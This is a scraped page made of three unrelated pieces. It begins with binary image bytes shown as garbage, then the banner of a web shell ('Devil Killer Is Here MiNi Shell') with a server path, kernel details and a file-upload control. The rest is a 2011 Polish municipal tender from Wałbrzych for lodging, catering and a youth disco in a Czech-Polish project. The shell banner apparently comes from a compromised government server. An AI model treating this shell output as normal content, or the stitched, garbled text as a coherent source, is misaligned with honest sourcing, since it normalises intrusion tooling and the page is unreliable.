JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110224/63839-N-2011.html

<p class="kh_header"><b>Wałbrzych: Usługa noclegowa i gastronomiczna dla uczestników projektu pn.:Poznawanie nie zna granic</b><br>
<b>Numer ogłoszenia: 63839 - 2011; data zamieszczenia: 24.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wałbrzych , Pl. Magistracki 1, 58-300 Wałbrzych, woj. dolnośląskie, tel. 074 6655153, 6655154, faks 074 6655155.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa noclegowa i gastronomiczna dla uczestników projektu pn.:Poznawanie nie zna granic.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi obejmującej pobyt, noclegi ze śniadaniem, wyżywienie, organizację wieczoru integracyjnego w ramach projektu, pn. Poznawanie nie zna granic, zgodnie z poniższą specyfikacją:

I.Zadanie nr 1 - Organizacja pobytu w Wałbrzychu.

W ramach tego zadania Wykonawca zorganizuje:
Nocleg ze śniadaniem w Wałbrzychu lub Szczawnie Zdroju w jednym budynku (1 doba hotelowa, z piątku na sobotę) dla grupy czeskiej - 26 osób (młodzież w wieku 13-15 lat - 20 osób, opiekunowie - 6 osób) w pokojach 1 lub 2-osobowych dla opiekunów oraz 2, 3 lub 4-osobowych dla młodzieży z łazienkami w pokoju. Zakwaterowanie w miejscu noclegu w piątek, w godzinach popołudniowych. Wykwaterowanie w sobotę do godz. 1000

Śniadanie w sobotę, w formie tzw. bufetu szwedzkiego (1 potrawa na ciepło, np. jajecznica lub kiełbaski na gorąco oraz potrawy na zimno, np. wędliny różnego rodzaju, sałatki, ser żółty różnego rodzaju, serki topione różnego rodzaju, twarożek, mleko, dżem, płatki śniadaniowe różnego rodzaju, pomidor, kawa, herbata, masło, pieczywo, cukier, świeża cytryna).

Terminy realizacji usługi: 15/16.04.2011, 20/21.05.2011, 10/11.06.2011, 23/24.09.2011, 21/22.10.2011,20/21.04.2012 25/26.05.2012

Wyżywienie dla 50 osób dla grupy czeskiej i polskiej:
Kolacja (piątek, Wałbrzych lub Szczawno Zdrój) - jedna potrawa na ciepło (np. ziemniaki z wody, sztuka mięsa w sosie), surówka, napoje - herbata, soki, woda mineralna (przybliżona godz. kolacji 2100).
Posiłki muszą być podane na zastawie stołowej.

Terminy realizacji usługi (kolacja): 15.04.2011, 20.05.2011, 10.06.2011, 23.09.2011, 21.10.2011, 20.04.2012, 25.05.2012.

Obiad dla 51 osób (sobota, Wałbrzych lub Szczawno Zdrój) - dwie potrawy na ciepło, tj. zupa (np. rosół lub pomidorowa z makaronem) i drugie danie (np. frytki, kotlet schabowy panierowany), surówki, soki i woda mineralna (przybliżona godz. obiadu 1300).
Posiłki muszą być podane na zastawie stołowej.
Suchy prowiant dla 51 osób (sobota) - woda mineralna 0,5 l w butelce i sok w kartonie 0,2 l, owoc (np. jabłko, banan, gruszka, brzoskwinia), słodka bułka lub kanapka, batonik.
Wykonawca dostarczy suchy prowiant w sobotę do miejsca, gdzie uczestnicy spożywać będą obiad na godz.1300.

Terminy realizacji usługi (obiad + suchy prowiant): 16.04.2011, 21.05.2011, 11.06.2011, 24.09.2011, 22.10.2011, 21.04.2012, 26.05.2012


II.Zadanie nr 2 - Poczęstunek, obiad oraz suchy prowiant dla 50 osób, podczas pobytu w Wałbrzychu (piątek):
W ramach tego zadania Wykonawca zorganizuje w piątek w szkole na stołówce lub w wyznaczonej przez Zamawiającego sali/ klasie:
Poczęstunek - tzw. słodki bufet - słodkie bułki różnego rodzaju lub pączki, ciasto, herbata, kawa, cukier, mleko do kawy, soki i woda mineralna, owoce (np. jabłko lub banan). Wykonawca zapewni naczynia jednorazowe (przybliżona godz. poczęstunku 900).
Obiad w szkole - dwie potrawy na ciepło, tj. zupa (np. krupnik) i drugie danie (np. ziemniaki z wody, filet drobiowy panierowany), surówki, soki (przybliżona godz. obiadu 1300). 
Posiłki muszą być podane na zastawie stołowej.
Suchy prowiant - woda mineralna 0,5 l w butelce i sok w kartonie 0,2 l, owoc (np. jabłko, banan, gruszka, brzoskwinia), słodka bułka lub kanapka, batonik. Wykonawca dostarczy suchy prowiant w piątek do wyznaczonej przez Zamawiającego szkoły na terenie Wałbrzycha na godz. 1300

Terminy i miejsce realizacji usługi: 
15.04.2011 - Publiczne Gimnazjum nr 2, ul. 11 Listopada 75
20.05.2011 - Publiczne Gimnazjum nr 5, ul. Wańkowicza 13
10.06.2011 - Publiczne Gimnazjum nr 9 przy ZSI, ul. Palisadowa 48
23.09.2011 - Publiczne Gimnazjum nr 7, ul. Grodzka 71
21.10.2011 - Publiczne Gimnazjum nr 6, ul. Główna 2
20.04.2012 - Publiczne Gimnazjum nr 4, ul. 1 Maja 149
25.05.2012 - Publiczne Gimnazjum nr 1, ul. Limanowskiego 12
 
III.Zadanie nr 3 - Organizacja pobytu w Karpaczu:

W ramach tego zadania Wykonawca zorganizuje:
I.Nocleg ze śniadaniem w Karpaczu w jednym budynku dla grupy czeskiej i polskiej (1 doba hotelowa, z soboty na niedzielę) dla 51 osób (młodzież w wieku 13-15 lat - 40 osób, opiekunowie - 11 osób), w pokojach 1 lub 2-osobowych dla opiekunów oraz 2, 3 lub 4-osobowych dla młodzieży z łazienkami w pokoju. Przyjazd do Karpacza w sobotę, w godzinach wieczornych (ok. godz. 1800). Wykwaterowanie, w niedzielę do godz. 1200.

Śniadanie w formie tzw. bufetu szwedzkiego (1 potrawa na ciepło, np. jajecznica lub kiełbaski na gorąco oraz potrawy na zimno, np. wędliny różnego rodzaju, sałatki, ser żółty różnego rodzaju, serki topione różnego rodzaju, twarożek, mleko, dżem, płatki śniadaniowe różnego rodzaju, pomidor, kawa, herbata, masło, pieczywo, cukier, świeża cytryna).


II.Wyżywienie dla 51 osób:
Kolacja (sobota, najlepiej w miejscu noclegu) - jedna potrawa na ciepło (np. placek po węgiersku z gulaszem i sosem), surówki, herbata, soki, woda, mineralna (przybliżona godz. kolacji 1800). 
Obiad (niedziela, najlepiej w miejscu noclegu) - dwie potrawy na ciepło, tj. zupa (np. zupa jarzynowa) i drugie danie (np. ryż z warzywami i pulpety mięsne lub ziemniaki z wody i porcja ryby panierowanej), surówki, soki, woda mineralna (przybliżona godz. obiadu 1300). 
Posiłki muszą być podane na zastawie stołowej.

Suchy prowiant (niedziela) - woda mineralna 0,5 l w butelce i sok w kartonie 0,2l, owoc (np. jabłko, banan, gruszka, brzoskwinia), słodka bułka lub kanapka, batonik (wydanie suchego prowiantu rano po śniadaniu).

III.Organizacja wieczoru integracyjnego w Karpaczu (sobota):
Zapewnienie Sali, w miejscu zakwaterowania, na dyskotekę w godz. 1900 - 2300 dla 51 osób.
Zapewnienie DJa - muzyka klubowa i z list przebojów (nowych i starszych z lat ubiegłych).
Zapewnienie napoi na wieczór integracyjny w Karpaczu (soki, woda mineralna - 0,5 l/ na osobę) .
Udział w wieczorze integracyjnym mogą mieć tylko uczestnicy projektu, tzn. wstępu na dyskotekę nie mogą mieć osoby trzecie. 

IV.Zapewnienie Sali w miejscu zakwaterowania, w niedzielę w godz. 1400 - 1500 w celu rozdania dyplomów dla uczestników (sala zwykła bez dekoracji).
Terminy pobytu: 16/17.04.2011, 21/22.05.2011, 11/12.06.2011, 24/25.09.2011, 22/23.10.2011, 21/22.04.2012, 26/27.05.2012.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.50.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W tym postępowaniu wadium nie obowiązuje</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy, że posiada uprawnienia do wykonywania działalności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełnienia ww.warunku dokonana będzie zgodnie z formułą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy, że posiada wiedzę i doświadczenie niezbędne do wykonania zamówienia. Ocena spełnienia ww.warunku dokonana będzie zgodnie z formułą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o dysponowaniu odpowiednim potencjałem technicznym. Ocena spełnienia ww.warunku dokonana będzie zgodnie z formułą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o dysponowaniu osobami zdolnymi do wykonania zamówienia. Ocena spełnienia ww.warunku dokonana będzie zgodnie z formułą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o znajdowaniu się w sytuacji ekonomicznej i finansowej umożliwiającej wykonanie zadania. Ocena spełnienia ww.warunku dokonana będzie zgodnie z formułą spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)Zmianę terminów realizacji usług w przypadku odwołania przez partnera z Republiki Czeskiej przyjazdu grupy czeskiej wskutek okoliczności, których Zamawiający nie był w stanie przewidzieć w chwili zawarcia umowy. O zmianie terminu (rezygnacji z terminu) Zamawiający powiadomi Wykonawcę, co najmniej na 7 dni przed realizają  każdego z terminów oraz podpisze z Wykonawcą stosowny aneks do umowy. Nowe terminy zostaną uzgodnione z Wykonawcą.
2)W sytuacji gdy zaistnieje niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie z niniejszą Specyfikacją.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.walbrzych.pl/zzp/usluganoclegowa.zip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Wałbrzych
Pl.Magistracki 1
58-300 Wałbrzych
pok.27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2011 godzina 10:00, miejsce: Urząd Miasta Wałbrzych
Pl.Magistracki 1
58-300 Wałbrzych
pok.10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany jest przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Współpracy Transgranicznej Republika Czeska - Rzeczpospolita Polska 2007-2013 - PRZEKRACZAMY GRANICE.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja pobytu w Wałbrzychu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach tego zadania Wykonawca zorganizuje:
Nocleg ze śniadaniem w Wałbrzychu lub Szczawnie Zdroju w jednym budynku (1 doba hotelowa, z piątku na sobotę) dla grupy czeskiej - 26 osób (młodzież w wieku 13-15 lat - 20 osób, opiekunowie - 6 osób) w pokojach 1 lub 2-osobowych dla opiekunów oraz 2, 3 lub 4-osobowych dla młodzieży z łazienkami w pokoju. Zakwaterowanie w miejscu noclegu w piątek, w godzinach popołudniowych. Wykwaterowanie w sobotę do godz. 1000

Śniadanie w sobotę, w formie tzw. bufetu szwedzkiego (1 potrawa na ciepło, np. jajecznica lub kiełbaski na gorąco oraz potrawy na zimno, np. wędliny różnego rodzaju, sałatki, ser żółty różnego rodzaju, serki topione różnego rodzaju, twarożek, mleko, dżem, płatki śniadaniowe różnego rodzaju, pomidor, kawa, herbata, masło, pieczywo, cukier, świeża cytryna).

Terminy realizacji usługi: 15/16.04.2011, 20/21.05.2011, 10/11.06.2011, 23/24.09.2011, 21/22.10.2011,20/21.04.2012 25/26.05.2012

Wyżywienie dla 50 osób dla grupy czeskiej i polskiej:
Kolacja (piątek, Wałbrzych lub Szczawno Zdrój) - jedna potrawa na ciepło (np. ziemniaki z wody, sztuka mięsa w sosie), surówka, napoje - herbata, soki, woda mineralna (przybliżona godz. kolacji 2100).
Posiłki muszą być podane na zastawie stołowej.

Terminy realizacji usługi (kolacja): 15.04.2011, 20.05.2011, 10.06.2011, 23.09.2011, 21.10.2011, 20.04.2012, 25.05.2012.

Obiad dla 51 osób (sobota, Wałbrzych lub Szczawno Zdrój) - dwie potrawy na ciepło, tj. zupa (np. rosół lub pomidorowa z makaronem) i drugie danie (np. frytki, kotlet schabowy panierowany), surówki, soki i woda mineralna (przybliżona godz. obiadu 1300).
Posiłki muszą być podane na zastawie stołowej.
Suchy prowiant dla 51 osób (sobota) - woda mineralna 0,5 l w butelce i sok w kartonie 0,2 l, owoc (np. jabłko, banan, gruszka, brzoskwinia), słodka bułka lub kanapka, batonik.
Wykonawca dostarczy suchy prowiant w sobotę do miejsca, gdzie uczestnicy spożywać będą obiad na godz.1300.

Terminy realizacji usługi (obiad + suchy prowiant): 16.04.2011, 21.05.2011, 11.06.2011, 24.09.2011, 22.10.2011, 21.04.2012, 26.05.2012.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.50.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - Poczęstunek, obiad oraz suchy prowiant dla 50 osób, podczas pobytu w Wałbrzychu (piątek).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach tego zadania Wykonawca zorganizuje w piątek w szkole na stołówce lub w wyznaczonej przez Zamawiającego sali/ klasie:
Poczęstunek - tzw. słodki bufet - słodkie bułki różnego rodzaju lub pączki, ciasto, herbata, kawa, cukier, mleko do kawy, soki i woda mineralna, owoce (np. jabłko lub banan). Wykonawca zapewni naczynia jednorazowe (przybliżona godz. poczęstunku 900).
Obiad w szkole - dwie potrawy na ciepło, tj. zupa (np. krupnik) i drugie danie (np. ziemniaki z wody, filet drobiowy panierowany), surówki, soki (przybliżona godz. obiadu 1300). 
Posiłki muszą być podane na zastawie stołowej.
Suchy prowiant - woda mineralna 0,5 l w butelce i sok w kartonie 0,2 l, owoc (np. jabłko, banan, gruszka, brzoskwinia), słodka bułka lub kanapka, batonik. Wykonawca dostarczy suchy prowiant w piątek do wyznaczonej przez Zamawiającego szkoły na terenie Wałbrzycha na godz. 1300

Terminy i miejsce realizacji usługi: 
15.04.2011 - Publiczne Gimnazjum nr 2, ul. 11 Listopada 75
20.05.2011 - Publiczne Gimnazjum nr 5, ul. Wańkowicza 13
10.06.2011 - Publiczne Gimnazjum nr 9 przy ZSI, ul. Palisadowa 48
23.09.2011 - Publiczne Gimnazjum nr 7, ul. Grodzka 71
21.10.2011 - Publiczne Gimnazjum nr 6, ul. Główna 2
20.04.2012 - Publiczne Gimnazjum nr 4, ul. 1 Maja 149
25.05.2012 - Publiczne Gimnazjum nr 1, ul. Limanowskiego 12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - Organizacja pobytu w Karpaczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach tego zadania Wykonawca zorganizuje:
I.Nocleg ze śniadaniem w Karpaczu w jednym budynku dla grupy czeskiej i polskiej (1 doba hotelowa, z soboty na niedzielę) dla 51 osób (młodzież w wieku 13-15 lat - 40 osób, opiekunowie - 11 osób), w pokojach 1 lub 2-osobowych dla opiekunów oraz 2, 3 lub 4-osobowych dla młodzieży z łazienkami w pokoju. Przyjazd do Karpacza w sobotę, w godzinach wieczornych (ok. godz. 1800). Wykwaterowanie, w niedzielę do godz. 1200.

Śniadanie w formie tzw. bufetu szwedzkiego (1 potrawa na ciepło, np. jajecznica lub kiełbaski na gorąco oraz potrawy na zimno, np. wędliny różnego rodzaju, sałatki, ser żółty różnego rodzaju, serki topione różnego rodzaju, twarożek, mleko, dżem, płatki śniadaniowe różnego rodzaju, pomidor, kawa, herbata, masło, pieczywo, cukier, świeża cytryna).


II.Wyżywienie dla 51 osób:
Kolacja (sobota, najlepiej w miejscu noclegu) - jedna potrawa na ciepło (np. placek po węgiersku z gulaszem i sosem), surówki, herbata, soki, woda, mineralna (przybliżona godz. kolacji 1800). 
Obiad (niedziela, najlepiej w miejscu noclegu) - dwie potrawy na ciepło, tj. zupa (np. zupa jarzynowa) i drugie danie (np. ryż z warzywami i pulpety mięsne lub ziemniaki z wody i porcja ryby panierowanej), surówki, soki, woda mineralna (przybliżona godz. obiadu 1300). 
Posiłki muszą być podane na zastawie stołowej.

Suchy prowiant (niedziela) - woda mineralna 0,5 l w butelce i sok w kartonie 0,2l, owoc (np. jabłko, banan, gruszka, brzoskwinia), słodka bułka lub kanapka, batonik (wydanie suchego prowiantu rano po śniadaniu).

III.Organizacja wieczoru integracyjnego w Karpaczu (sobota):
Zapewnienie Sali, w miejscu zakwaterowania, na dyskotekę w godz. 1900 - 2300 dla 51 osób.
Zapewnienie DJa - muzyka klubowa i z list przebojów (nowych i starszych z lat ubiegłych).
Zapewnienie napoi na wieczór integracyjny w Karpaczu (soki, woda mineralna - 0,5 l/ na osobę) .
